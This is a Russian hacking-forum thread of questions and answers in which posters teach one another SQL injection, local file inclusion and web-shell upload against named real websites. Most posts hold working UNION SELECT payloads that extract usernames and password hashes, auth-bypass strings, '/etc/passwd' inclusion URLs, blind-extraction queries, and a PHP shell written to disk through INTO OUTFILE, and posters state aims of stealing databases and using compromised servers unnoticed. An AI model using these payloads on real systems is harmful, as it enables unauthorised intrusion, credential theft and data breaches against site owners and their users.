Не несите бред, еще с версий 1.* по дефолту в конфиге апача стоит deny на все .ht* файлы

Извиняюсь, то была шутка.

:.']http://site.ru/script.php?id=-1'+union+select+1,2,3,4+--+

Будет работать при mq=off



mysql_query("SELECT * FROM articles WHERE id=".$_GET['id']."");

Когда стоят кавычки '', запрос получается:

$response=mysql_query("SELECT * FROM articles WHERE id='1+union+select+1,3,4+--+'");

MySql вернет ошибку из-за незакрытой кавычки. Нужно закрыть кавычку и делать запрос:

$response=mysql_query("SELECT * FROM articles WHERE id='1' union select 1,2,3,4+--+'");

Читай: http://forum.antichat.ru/thread19844.html

Спасибо, помогло. понял. постате ему +.
А теперь расскажите пожалуйста, почему так работает
.php?id=-1'+union+select+1,version(),3,4,5,6,7,8+--+

а так нет

.php?id=-1'+union+select+1,version(),3,4,5,6,7,8--

т.е. как влияют плюсики??

Для комментирование с помощью -- нужно наличие хотя бы одного пробела после второго тире.

Он спросил,почему без пробела не работает. А частные случаи это уже вообще не в тему. Такое чувство,что тебе пофиг что писать, лишь бы что-то.

.php?id=-1'+union+select+1,version(),3,4,5,6,7,8-- да оно вроде и так работает это по документации обязятеьлно плюс в конце я не ставил и работает посмотри в тему где скули есть то встречаються и бес + и работают вот пример скули:

оно и без комментов работает, там и так конец запроса

всем привет...объясните плз, вот часто вижу такие варианты инъекций
?id=123+and+1=0+union+select+1,2,3/*
?id=123+or+1=0+union+select+1,2,3/*
с подстановкой ', +and+1=2, +or+1=2 и т.д. для поиска уязвимостей вроде понятно, а для чего нужны вышеприведенные примеры? что они делают? из того что я нашел
Основные Булевы операторы также распознаются в MySQL. Выражения Буля - являются или верными или неверными, подобно предикатам. Булевы операторы связывают одно или более верных/неверных значений и производят единственное верное или неверное значение. Стандартными операторами Буля распознаваемыми в SQL являются:AND,OR и NOT. вроде что-то понятно, но не до конца ) может кто нить объяснить??

Gidz, не во всех случаях бывает, что Выводится ошибка, бывает просто пустой лист, поэтому и применяются подзапросы типа and или or, например, если это выводит ошибку ?id=123+and+1=0+union+select+1,2,3/*, а ?id=123+and+1=1+union+select+1,2,3/* выводит саму страницу 123, то мы имеем инъекцию

Gidz, не во всех случаях бывает, что Выводится ошибка, бывает просто пустой лист, поэтому и применяются подзапросы типа and или or, например, если это выводит ошибку ?id=123+and+1=0+union+select+1,2,3/*, а ?id=123+and+1=1+union+select+1,2,3/* выводит саму страницу 123, то мы имеем инъекцию
Зачем говоришь, если сам абсолютно ничего в этом не понимаешь?

"and 1=0" это не подзапрос. Бывает так, что из БД не выводятся в цикле все значения, а только первая запись. При запросе
SELECT `id`, `username`, `password` FROM `users` WHERE `id` = 1 UNION SELECT 1,2,3
mysql вернет результат, состоящий из двух строк, примерно так:
1 admin pass
1 2 3
Так вот, если в скрипте выводится только первая строка, то надо сделать так, чтобы первой была строка с нашей инъекцией, поэтому и добавляется "and 1=0", "and null", etc... Таким образом запрос будет:
SELECT `id`, `username`, `password` FROM `users` WHERE `id` = 1 AND 1=0 UNION SELECT 1,2,3
Тоесть с БД выбирается та строка, где id = 0 и 1 = 2. 1 не будет равно 2 никогда, поэтому такой строки нету, и первой будет строка
1 2 3

Есть сайт на котором если 2 инклуда но в обеих стоит папка в скрипте допустим
include('config/'.$page.'.php');
$page передается без экранирования

Можно ли сделать инклуд с внешних ресурсов, если нет то что можно полезного достать через локальный инклуд

ПС на сайте есть форум phpBB

Есть сайт на котором если 2 инклуда но в обеих стоит папка в скрипте допустим
include('config/'.$page.'.php');
$page передается без экранирования

Можно ли сделать инклуд с внешних ресурсов, если нет то что можно полезного достать через локальный инклуд

ПС на сайте есть форум phpBB
С внешних ресурсов не заинклудишь, т.к. есть префикс config, НО тебе крупно повезло, что есть phpBB форум. Зарегайся на нем, залей аватару с PHP-кодом, проинклудь её, PHP-код выполнится.

С внешних ресурсов не заинклудишь, т.к. есть префикс config, НО тебе крупно повезло, что есть phpBB форум. Зарегайся на нем, залей аватару с PHP-кодом, проинклудь её, PHP-код выполнится.
А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (

А какже префикс .php ?
И в phpBB папка /forum/images/avatars/ пуста, значит аватары скорее всего в БД = (
Ну в таком случае тебе не повезло.
А если все же в папке,то как то так: ../path_to_avata.gif%00

А точно в /images/avatars/ должны авы лежать?
Листинг каталогов открыт

спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??

спасибо mailbrush , вроде понятно, а как узнать что БД выводит только первое значение записи?
и вот еще такой пример инъекции нашел
?id=14+and+0+union+select+1,2,3,4,5,6,7,8
как ее понимать??
Если подобрал поля, но ни одно из них не выводится, вероятно всего - это именно тот случай. После подстановки "-", "and 1=0" все должно заработать.

есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?

concat_ws(0x3a,table_schema,table_name,column_name )

есть скуля. получил имена таблиц. но они не работают. т.к. надо узнать имя БД. т.е. табла лежит в другой БД. как узнать имя БД?
union select 1,2,database(),4,5
3 - выводимая колонка.

Если через тулзу:

http://www.akos-icco.ru/news.php?part=1+or+1=1+and+substring(version(),1,1 )=4--+

database(): w_akos
version(): 4.1.20-1.gms
@@version_compile_os: pc-linux-gnu
user(): w_akos@195.42.160.50

Post-метод, настройки:

$bl_url = "http://www.akos-icco.ru/news.php?part=1+or+1=1";
$bl_filtr = "--+";
$bl_plus = "+";
$bl_error = "8 декабря 2008";
$bl_error_type = 1;

Скрипт сохранить в ANSI-формате

Brute tables
-------------
members
subscribe
news
articles

Дальше сам

В поис вставляем галочку site/list.aspx?q=' Получаем:

Server Error in '/' Application.
Invalid operator for data type. Operator equals modulo, type equals varchar.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Invalid operator for data type. Operator equals modulo, type equals varchar.

Source Error:

Line 94: paramCollection.Add(new SqlParameter("@Keywords", keywords));
Line 95: paramCollection.Add(new SqlParameter("@StatusId", statusId));
Line 96: DataTable dt = Sql.ExecuteQuery("dt", "spCourse_Search", paramCollection);
Line 97: return dt;
Line 98: }


Source File: d:\websites\LocalUser\modernsalonlearningc\App_Cod e\Course.cs Line: 96

Stack Trace:
Дальше лабудень непонятная. Это что значит? уязвимость? Можно базу собрать? Просто с sql не знаком, если скажете что можно - буду читать, учить, пробовать. Очень база с сайта нужна.

Ошибка в типах. Это не инъекция

union select 1,2,database(),4,5
3 - выводимая колонка.
При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица. Делается это так:
SELECT table_schema FROM information_schema.tables WHERE table_name = 'твоя_таблица'
Если кавычки экранируются, переводи либо в HEX либо в CHAR.

Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает Wrong usage of UNION and ORDER BYYou have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''99999999, 25' at line 1 ?
Спасибо.

Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает ?
Спасибо.
Да это sql-injection в SQL операторе LIMIT

для mff:
http://www.etiket-shop.ru/pages.php?Page=65&nID=-132'+union+select+1,2,3,@@version,5--+

Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает ?
Спасибо.
Limit стоит после order by. Потому если file_priv N, то ничего не сделаешь. Второй вариант, как уже описали выше, найти другую скулю :)
При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица.
что-то я обкурился :)

Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть :)

версия Mysql ниже 5, а точней 4.0.26-log
Вариант перебор таблиц и полей!

Alf0x0ns, ага, уже перебирал. Может кто словариком задобрит?

Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе?

спасибо v1d0qz.

Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе?

Столько ошибок в одной строчке :) не в обиду, но больше читай мануалы, это совет :)

user_privileges брать в кавычки не нужно, это ж табличка. UPDATE нужно взять в такие кавычки, чтобы он не определялся как оператор. Там где tracker и localhost нужно отслешировать кавычки, чтобы они не рвали запрос.
INSERT INTO USER_PRIVILEGES VALUES('tracker\'@\'localhost',null, `UPDATE`,YES)

А каким еще способом можно увеличить привилегии юзера бд.
Система фрибсд 7.2.

Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть :)
Возможен auth bypass,не фильтруються переменные логина и пароля....
Я не смотрел,но может поможет в дальнейшем.
ЗЫ:login -
' or 1=1/*
admin'/*

admin:testadmin

что за инъекция:...
http://www.aaadtc.com/page.php?content=buy&cnum=21
подставляя кавычку
http://www.aaadtc.com/page.php?content=buy&cnum=21'
вылетает ошибка
Fatal error: Call to a member function execute() on a non-object in /home/.rhino/lsdtc/mydtcbusiness.com/clientsites/bigdeli_nader/data/buy.php on line 92
После подбирая количество полей нахожу нужное количество. Но принтабельного поля нет...
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14--

что это такое?

Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?

Подскажите, как найти адрес к phpmyadmin у http://centre.ru ?
Брутить пути и субдомены =)
Если phpmyadmin там есть вообще...
billing.centre.ru это не пойдет?

Посмотри в (субдоменны ))

GinTonic,

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+

GinTonic,

http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+
а почему ноль на двойку заменил?
и почему в 3 и 12?

а почему ноль на двойку заменил?
и почему в 3 и 12?
смотри внимательней
http://www.aaadtc.com/page.php?content=buy&cnum=21+and+1=2+union+all+select+1,2,password,4,5, 6,7,8,9,10,11,username,13,14+from+users--+

Для GinTonic:
1. Думаю для автора скули лутше так будет):
http://www.aaadtc.com/page.php?content=buy&cnum=-21+union+all+select+1,2,password,4,5,6,7,8,9,10,11 ,username,13,14+from+users--

2. Если убрать password и поставить 3 или 35656 то ты увидишь как сайт выведет эти числа, можно заменять любое число которое выводица на сайте при скуле, а уже пассворд и юсернаме это часть(столбцы) таблицы юсер для их вывода ты должен их знать!

Читай статьи на форуме))):
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд (http://forum.antichat.ru/thread104591.html)
SQL инъекция (в т.ч. и blind SQL) (http://forum.antichat.ru/thread19844.html)
Примеры:
Sql Инъекции (http://forum.antichat.ru/thread21336.html)

смотри внимательней
а для чего там all нужен?

такой инъекшн, помогите раскрутить..
так все выводить, базу:таблицу:столбец
-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,table_sche ma,table_name,column_name),6,7,8,9,10+FROM+informa tion_schema.columns+WHERE+table_name=0x75736572+LI MIT+0,1+--+
пытаюсь посмотреть данные, но ничего нет, тоесть вообще пусто, даже пропадают цифры, в принтабельных полях
-133+UNION+SELECT+1,2,3,4,concat_ws(0x3a,USERID,USE RNAME,USERPASSWORD),6,7,8,9,10+FROM+basename.user+ LIMIT+0,1+--+
но ведь должны быть какие-то данные, я пробовал в других таблицах смотреть, но тоже самое, не выводит ничего. Может что не так делаю? Или все таки пустые таблицы?
зы Не хотелось бы светить сайт, может кто по асикю подскажет?

зыы и еще может кто нить подскажет, что можно почитать по скулям через куки, а то ничего толком найти не могу ((

тест пустая табла или нет
...+select+count(*)+from+....
;)

Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?

file_priv

file_priv
site.com/new.php?id=-1+union+select+1,file_priv,3--
так да?
щас просто попробывал на пару сайтов ошибка вылазит =/

выводит привилегии на доступ у юзеров.
site.com/new.php?id=-1+union+select+1,concat_ws(0x3a,user,password,file _priv),3+from+mysql.user--

Ребята такой вопрос как узнать есть ли привелегия FILE в mysql через sql-inj,для версии 4.*.* и 5.*.* ?site.com/new.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='username'/** где username - имя юзера под которым работает база.

тест пустая табла или нет
;) 0 я так понял означает что таблица пуста? :(

прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:
Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (t.page_title like '%'%') or (t.brief like '%'%') or (t.metakeywords like' at line 6 in

и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный

так тебе ничего никто не поможет.. нужно ссылку на сайт со скулей.

прощу помочь с этим скулем:
http://localhost//?script=%2527
вывод:

и пробовал
http://localhost//?script=%2527)+order+by+1+--+
тоже результат такой же ((
Как поступит в таком случае? Думал найду в других страничках но скул единственный
http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection

Это к примеру,т.к точного уязвимого скрипта нет.

DarkAngel']http://localhost/?script=%2527)/* - так запрос должен выполниться без ошибок.
http://localhost/?script=%2527) union select 1,2,3,user()/* - вот так будет sql-injection

Это к примеру,т.к точного уязвимого скрипта нет.
вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти

вроде ?script=%2527)/* норм но как добалю union select та же ошибка хз как обойти
Скидывай лог ошибки и если есть возможность изменить скрипт выводи sql запрос в браузер,так проще будет разобраться в чем причина.

тоесть как выводит то сам запрос в браузер

отправил в пм линк

спасибо M.W.N.N. и Rullery =)

ну вот с привелегий FILE разобрался , ребята не можете теперь помочь как залить шелл если имееться данная привелегия и слышал что вначале лучше залить какой то "плохой" шелл а далее через него уже нормальный.Кто что посоветует по данному сабжу?

union+select+'<? system($_GET['cmd']); ?>'+into+outfile+'/[path]/shell.php'
Дальше site.com/shell.php?cmd=[command]

http://www.wearhouse.ru/show_img.php?img=http://img.yandex.net/i/www/logo.png

можно инклудить любую картинку, есть возможность заинклудить не картинку?

Причём тут инклуд? Просто адрес картинки подставляется в html тег или что-то типо того,что с php вообще никак не связано.

ясно, я видел что подставляется адрес картинки,просто решил уточнить.спс.

ну хотя бы скули там есть )

Причин может быть много. Скинь ссылку в пм, если так не хочешь ей светить, а я уже потом скину в общак ответ со скрытой ссылкой.
уже отправил в личико.
Что получается я зря палил линк ((

union+select+'<? system($_GET['cmd']); ?>'+into+outfile+'/[path]/shell.php'
Дальше site.com/shell.php?cmd=[command]что-то я не понял .. можно поподробнее?

уже отправил в личико.
Что получается я зря палил линк ((
Почему же?))
Сайт конечно не кислый с таким количеством тиц и таким возрастом домена :)

По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
?script=%2527/**/and/**/1=1#
ну или так если с выводом..
?script=%2527/**/and/**/1=%25271
Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., запятая косит запрос, потому потому это ещё усложняет дело.
зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
зы2. Через post всё аналогично.

что тут не понятного не гони записыв. результат в файл ... Потом пишеш в адресной строке путь к файлу и передаеш ему команды через гет переменную!
тока бока с кодировкой могут быть

1 (http://www.softtime.ru/dic/id_dic=16&id_group=1)
2 (http://forum.vingrad.ru/forum/topic-141471/unread-1.html)
в браузере кодировка -> 866 после шелла когда запускаем!
спасибо , но уже перепробывал кучу вариантов ,ничего не получается,возможно что то не так делаю ...
кодировку делаю...
вот например сайтик с прив file
[+]Printable field: 3,4,5
[+]Vuln URL: http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,3,4,5,6,7,8,9--
[+]MySQL Info: signature@localhost:4.1.22:signature:binjportbld-freebsd4.10

а тут и не получиться у тебя, ковычки фильтруются, но зато читалка файлов есть.

путь правильный и слешы / читай пост джокестера там написано вконце

тебе сюда (http://forum.antichat.ru/thread104591.html)
спасибо походу нашёл то что надо
https://forum.antichat.ru/threadnav34338-1-10.html

пля жаль что только читалка файлов =/

http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,file_priv,4,5,6,7,8,9+from+m ysql.user--

а я думал што файл прив ето только привелегия пользователя рут...

вот пасс
http://www.sfinc.ca/details.php?product=-3403+UNION+SELECT+1,2,group_concat(0x3a,user,passw ord),4,5,6,7,8,9+from+mysql.user--

signature2ab907306f36b10c,signature

а также есть табличка clients:)

sportonline.com.ua

Что за движок новостей?
Пример показывания новости: sportonline.com.ua/index.php?cont=long&id=8320

(не самописный! если ввести в google -> cont=long&id= , то станет ясно что точно не самописный)

Почему же?))
Сайт конечно не кислый с таким количеством тиц и таким возрастом домена :)

По теме. Щас уезжаю, потому доковырять не успею. Пока успел вывести только правильный запрос.
?script=%2527/**/and/**/1=1#
ну или так если с выводом..
?script=%2527/**/and/**/1=%25271
Потом, дубли организовать пока не удалось, выбивает 'Error Column 'table_name' in field list is ambiguous in', возможно из за того что до этого стоит ещё 2 или 3 join, а возможно и фикс, что за ошибка разберусь когда прийду, потому как раньше у меня такой ещё небыло. Далее.., там запятая косит запрос, потому блинд огранизовать пока не удалось. Если реально как-то сделать без запятых, я внимательно слушаю :)
зы. Так как это LIKE, то обрывать нужно через #, а пробелы как вы наверное заметили я заменил на /**/
зы2. Через post всё аналогично.
ну спс буду поковырят, если что составиш правильный запрос жду резултатов.
Вот тока не пойму как можно выводит sql запросы на браузер, тоесть что отправлю через гет пост и на какой запрос превращается

не могу подобрать именя таблиц и столбцов в 4ой версии (П.С. вывод виден только в исходном коде стр.), нужна Ваша помощь

http://elmash-holding.ru/elmcatalog/?subclass=-42+union+select+1,version()--

Не подскажите пожалуйста хороший сканер для директорий сайта ..?

erolom, security-digger.org

wolmer, смахивает на DLE

Pelmeshko HEAD Scaner (http://forum.antichat.ru/thread40031.html)

х3, думаю покатит

'1' UNION SELECT 1,TABLE_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.TABLES --
Вывело список таблиц, причем всех

'1' UNION SELECT 1, COLUMN_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='TABLE' LIMIT 2,1 --
TABLE также пробовал в hex виде (0х***)

Выскакивает при попытке подать запрос следующее:

com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorEx ception: Unknown column '*!?TABLE*!?' in 'where clause'

Я так понимаю перебирать только вручную поможет?

проверь имя таблицы

2erolom DirBuster написан на Java лудшего пока не встречал в коплекте огромные словари

словарик..http://www.chestor92.ru/publ/slovari_dlja_bruta/1-1-0-47

хех не подумал что встречу 3ую ветку, спс за помощь ))

Продолжение поста.


Вообщем досмотрел я запрос, Яника, если не ошибаюсь. Там головняк ещё тот. Вообщем сложно, долго, но реально.

Как оказалось, я не увидел что там стояло 2 дужки. Ну и собственно что получилось..
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/version%28%29/**/for/**/1%29=3/*
Дальше ковырять не стал, потому как в 3-й версии особо не повоюешь, т.е. у меня нету столько свободного времени. Вот так вот.
зы. а с дублями там вообще помоему фикс, если я не ошибаюсь.
упс тут вроде не третая версия:
?script=%2527))/**/and/**/(version()/**/like/**/%25275%%2527)/*
на 5версию норм обрабатывает. Тока я не понял как теперь составит правильный запрос что вытянут имена из information_schema.tables если это реально конечно

Продолжение поста.

Вообщем досмотрел я запрос, Яника, если не ошибаюсь. Там головняк ещё тот. Вообщем сложно, долго, но реально.

Как оказалось, я не увидел что там стояло 2 дужки. Ну и собственно что получилось..
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/version%28%29/**/for/**/1%29=3/*
Дальше ковырять не стал, потому как в 3-й версии особо не повоюешь, т.е. у меня нету столько свободного времени. Вот так вот.
зы. а с дублями там вообще помоему фикс, если я не ошибаюсь.

упс тут вроде не третая версия:
?script=%2527))/**/and/**/(version()/**/like/**/%25275%%2527)/*
на 5версию норм обрабатывает. Тока я не понял как теперь составит правильный запрос что вытянут имена из information_schema.tables если это реально конечно
ой извини дружище, писал на спешку уходя с офиса. Вот правильный запрос.
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/1/**/for/**/1%29=5/*

На счёт дальнейшего перебора, мой вам совет, возьмите для начала что-нибудь по проще, толк будет намного больше, я серьёзно...
ps. а по поводу как именно перебирать, то здесь всё просто.
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*

ой извини дружище, писал на спешку уходя с офиса. Вот правильный запрос.
?script=%2527%29%29/**/and/**/substring%28version%28%29/**/from/**/1/**/for/**/1%29=5/*

На счёт дальнейшего перебора, мой вам совет, возьмите для начала что-нибудь по проще, толк будет намного больше, я серьёзно...
ps. а по поводу как именно перебирать, то здесь всё просто.
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
угу немного сложновато придется перебор, вот я саму конструкцию немного непонял. Где тут номер для второго символа ставит?
/LIMIT/**/2,1)/**/from/**/1/**/for/**/1)))=99/* не пашет так как на запятую ругается. Если бы запрос было таким: AND ascii(lower(substring(user(),4,1)))>110 то понятно что тут четвертый символ перебирается, но выше немного посложнее как видно и еще на запросе уже написан имя character_sets и зачем надо еще раз перебират если уже известно название ))

YuNi|[c,

https://forum.antichat.ru/showpost.php?p=1734696&postcount=12
https://forum.antichat.ru/showpost.php?p=1734851&postcount=13

PostgreSQL
Query failed: ERROR: UNION типы double precision и character varying не совпадают
как преобразовать тип данных для вывода информации?

использовать функцию cast, например:
UNION+SELECT+null,null,cast(username+as+text),null ,null+from+users

грабли
ERROR: UNION типы double precision и text не совпадают

Здравствуйте. Подскажите, вот допустим есть такая инъекция

http://arcadepod.com/shockwave/gotogame.php?id=2358 union select 1,2,3,4

если поставить "-" или например несуществующее значение переменной id, то редиректит на другую станицу с ошибкой.. можно ли как нить вывести нужные значения?

http://arcadepod.com/shockwave/gotogame.php?id=2358+and+null+union+select+1,2,con cat_ws(0x3a,user(),database(),version()),4

Чо делать после с базой после расшифровки паса? Я тут одну вскрыл, но хз, что с ней делать. И как найти админку? КУды входить по этому пасу? :confused:

YuNi|[c,

https://forum.antichat.ru/showpost.php?p=1734696&postcount=12
https://forum.antichat.ru/showpost.php?p=1734851&postcount=13
ну спс уже прочел но там:
substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)

и в моем случае
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц

Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php

Подскажите, как заюзать sql здесь? http://dmironova.ru/admin/login.php

а с чего ты вззял что там скуля?

Упс, там случилось что-то, не работает скрипт, ещё вчера была форма входа с sql
Извиняюсь, ссылка битая теперь тут всё это лежит: http://dmironova.ru/admin/?lang=no

а с чего ты вззял что там скуля?
http://dmironova.ru/admin/
'or 1=1/*

http://dmironova.ru/admin/login.php?lang=../../../../../../etc/passwd%00

http://dmironova.ru/admin/login.php?lang=hjhj

Warning: include_once(/home/dmironova/dmironova.ru/docs/admin/language/hjhj/admin/total.php) [function.include-once]: failed to open stream: No such file or directory in /home/dmironova/dmironova.ru/docs/admin/function.php(1) : eval()'d code on line 179

инклуд?

инклуд?
http://dmironova.ru/admin/login.php?lang=/../../../../../../../../../../../../../../etc/passwd%00

инклуд?
Да, инклуд.
http://dmironova.ru/admin/login.php?lang=../../.htaccess%00

ну спс уже прочел но там:
substring((select password from user limit 0,1),1,1) <=> substring((select password from user where id = 1) FROM 1 FOR 1) <=> mid((select password from user where id = 1) FROM 1 FOR 1)

и в моем случае
?script=%2527))/**/and/**/lower(ascii(substring((select(table_name)from(info rmation_schema.tables)where/**/table_name=%2527CHARACTER_SETS%2527/**/LIMIT/**/1)/**/from/**/1/**/for/**/1)))=99/*
тоесть названия определенной таблы написано и незнаю как делат запрос чтоб узнать вторую, третью и тд названия таблиц

А то, что по второй ссылке прочитал ? Там показано как использовать лимит при фильтрации запятых.

Вот похожая ситуация
https://forum.antichat.ru/showpost.php?p=1550051

Разберись что и как и подгони запрос под свою скулю.

Собственно получил доступ к админке одного сайта, с расширением php файлы не хочет кушать , пробывал заливать с расширением php.jpg но тоже не помогает (так же можно залить в .doc .pdf форматах).. такое часто у меня случается , может есть какие либо способы залить шелл ещё ?

Database Version: 5.0.32-Debian_7etch5-log

Проблемма такова делаю выборку :

_http://www.skr.su/?div=spec&id=1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,AES_D ECRYPT(AES_ENCRYPT(CONCAT(0x2d2d2d2d,login,0x2d2d2 d2d,pass,0x2d2d2d2d),0x71),0x71),13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46+FROM+users+LIMI T+1,1--
показывает такой пароль админа (їљџ·„‚7) , причем смотрите сами такие пароли с аброкадаброй у вех пользователей .

кто что думает ?

http://hardon.ru/index.php?action=getCat&catid=110+union+select+1,2,3,4,5,6,7--
инъекция или нет?

2 GinTonichttp://hardon.ru/index.php?action=getCat&catid=110+union+select+version()<input type="checkbox" name="vendor[1]" value="4.1.25-log" />4.1.25-log<br />

Такая ситуация есть сайт со скулей,но стоит лимит на вывод , БД довольнотаки большая , есть ли у кого мысли как сразу всё слить?шелл пока что не удалось залить =/

Такая ситуация есть сайт со скулей,но стоит лимит на вывод , БД довольнотаки большая , есть ли у кого мысли как сразу всё слить?шелл пока что не удалось залить =/
использовать GROUP_CONCAT()
лучше вариантов вроде нету.
https://forum.antichat.ru/showthread.php?t=118842

Сообственно один сайт инклудит страницу в iframe. Возможно ли как-то при помощи JavaScript'a модифицировать внешний вид того сайта, что инклудит? И что вообще можно сделать?

инъекция или нет?
поигрался бы с логикой:
http://hardon.ru/index.php?action=getCat&catid=110+and+1=1
http://hardon.ru/index.php?action=getCat&catid=110+and+1=2

Сообственно один сайт инклудит страницу в iframe. Возможно ли как-то при помощи JavaScript'a модифицировать внешний вид того сайта, что инклудит? И что вообще можно сделать?
Как ты думаешь на чей стороне сработает джава скрипт на стороне сервера или клиента?
---
что ты хочешь вообще сделать?. если модифицировать сайт- не мудри давай заливай шелл :D

почитай книгу Кузи в избранном.

Как ты думаешь на чей стороне сработает джава скрипт на стороне сервера или клиента?
Клиента конечно. Так и модифицировать на стороне клиента.

Database Version: 5.0.32-Debian_7etch5-log

Проблемма такова делаю выборку :

_http://www.skr.su/?div=spec&id=1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,AES_D ECRYPT(AES_ENCRYPT(CONCAT(0x2d2d2d2d,login,0x2d2d2 d2d,pass,0x2d2d2d2d),0x71),0x71),13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46+FROM+users+LIMI T+1,1--
показывает такой пароль админа (їљџ·„‚7) , причем смотрите сами такие пароли с аброкадаброй у вех пользователей .

кто что думает ?


зато вобла ловится :D

http://www.skr.su/?div=spec&id=-1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,hex(unhe x(password)),13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46+FROM+forum_user--

Посоветуйте, что можно сделать с шестью юникс дедиками имея на них только юзер привелегии? Желательно что нибудь полезное и что бы не сразу впалили.

хелп, помогите победить :)
http://xxx/browse.php?cat=999999999'+union+select+1,2,3,4,5,6 +--+

http://[закрыто по просьбе правообладателя]/browse.php?cat=5'+and+1=2+union+select+111,222,333 ,concat_ws(0x2F,version(),database(),user()),555,6 66--+

В сурсе

<p align='center'>The directory you requested could not be found. If you believe this is a bug, please contact <a href='mailto:?subject=Dir Not Found: /files/5.0.51b-log/fusion/fusion@ginger'>sir</a>.</p>

http://[hide]/browse.php?cat=5%27+or(1,1)=(select+count(0),conca t((select+concat_ws(0x3a,table_name,column_name)+f rom+information_schema.columns+where+column_name+L IKE+%27%password%%27+LIMIT+0,1),floor(rand(0)*2))f rom(information_schema.tables)GROUP+BY+2)--++

ну или так, если ты не хочешь колупать сорцы. ps. кури ману.

Даже не знаю где спросить. Ни у кого нету словарика таблиц и колонок, для 4-й ветки мускула? Я помню тут постили , тока найти не могу чё то.

2kfor
https://forum.antichat.ru/nextnewesttothread56632.html
http://forum.antichat.ru/thread45790.html

Group_concat(table_name) всегда возвращает все таблицы(если есть доступ к information_schema)? И как чтобы он по базам возвращал а не все таблицы разом?

